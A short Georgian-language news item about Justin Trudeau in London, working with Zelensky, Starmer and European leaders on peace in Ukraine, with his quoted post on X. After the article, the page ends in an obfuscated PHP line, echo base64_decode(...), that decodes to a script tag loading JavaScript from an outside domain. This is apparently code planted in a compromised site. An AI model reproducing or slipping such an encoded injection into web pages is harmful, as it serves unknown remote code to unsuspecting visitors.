tube
ავერსი jaluzi

კანადის პრემიერ-მინისტრი, ჯასტინ ტრუდო აცხადებს, რომ უკრაინის პრეზიდენტ ვოლოდიმირ ზელენსკისთან, გაერთიანებული სამეფოს პრემიერ-მინისტრ კირ სტარმერთან და ევროპელ ლიდერებთან ერთად უკრაინაში სამართლიანი და ხანგრძლივი მშვიდობის დასამყარებლად მუშაობს.

„ვიმყოფები ლონდონში, ვმუშაობ პრეზიდენტ ზელენსკისთან, პრემიერ-მინისტრ სტარმერთან და ევროპელ ლიდერებთან უკრაინაში სამართლიანი და ხანგრძლივი მშვიდობის დასამყარებლად, რომელიც უზრუნველყოფს უკრაინის სუვერენიტეტსა და უსაფრთხოებას“, - წერს ჯასტინ ტრუდო სოციალურ პლატფორმა X-ზე.

შეგახსენებთ, ჯასტინ ტრუდო გაერთიანებულ სამეფოში საერთაშორისო ლიდერების სამიტზე დასასწრებად ჩავიდა, რომელზეც უკრაინის საკითხს განიხილავენ. ამ წუთებში ლიდერები სამიტზე დასასწრებად იკრიბებიან.

193
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");